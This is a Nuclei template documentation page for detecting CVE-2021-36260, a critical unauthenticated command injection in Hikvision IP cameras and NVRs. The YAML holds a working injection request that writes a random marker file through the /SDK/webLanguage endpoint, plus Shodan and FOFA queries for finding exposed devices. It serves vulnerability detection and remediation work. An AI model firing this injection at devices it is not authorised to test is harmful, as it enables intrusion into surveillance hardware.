Skip to content
Nuclei Templates

Hikvision IP camera/NVR - Remote Command Execution

ID: CVE-2021-36260

Severity: critical

Author: pdteam,gy741,johnk3r

Tags: cve2021,cve,hikvision,rce,iot,intrusive,kev

Description

Section titled “Description”

Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

YAML Source

Section titled “YAML Source”
id: CVE-2021-36260


info:
  name: Hikvision IP camera/NVR - Remote Command Execution
  author: pdteam,gy741,johnk3r
  severity: critical
  description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device.
  remediation: |
    Apply the latest firmware update provided by Hikvision to mitigate this vulnerability.
  reference:
    - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
    - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
    - https://github.com/Aiminsun/CVE-2021-36260
    - https://therecord.media/experts-warn-of-widespread-exploitation-involving-hikvision-cameras/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-36260
    cwe-id: CWE-78
    epss-score: 0.97484
    epss-percentile: 0.99965
    cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\/sl_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hikvision
    product: ds-2cd2026g2-iu\/sl_firmware
    shodan-query: http.favicon.hash:999357577
    fofa-query: icon_hash=999357577
  tags: cve2021,cve,hikvision,rce,iot,intrusive,kev
variables:
  string: "{{to_lower(rand_base(12))}}"


http:
  - raw:
      - |
        PUT /SDK/webLanguage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8


        <?xml version="1.0" encoding="UTF-8"?><language>$(echo {{string}}>webLib/x)</language>
      - |
        GET /x HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{string}}"
# digest: 490a0046304402202f72d422297c1ba5a3da0796b28fb20e869870a1094f16074b1c52e52cdb142502203432fe54bc4f5f68be72c6b3e4c4806c9f1690642a8f11da5765ba6366cfe5ae:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-36260.yaml"

View on Github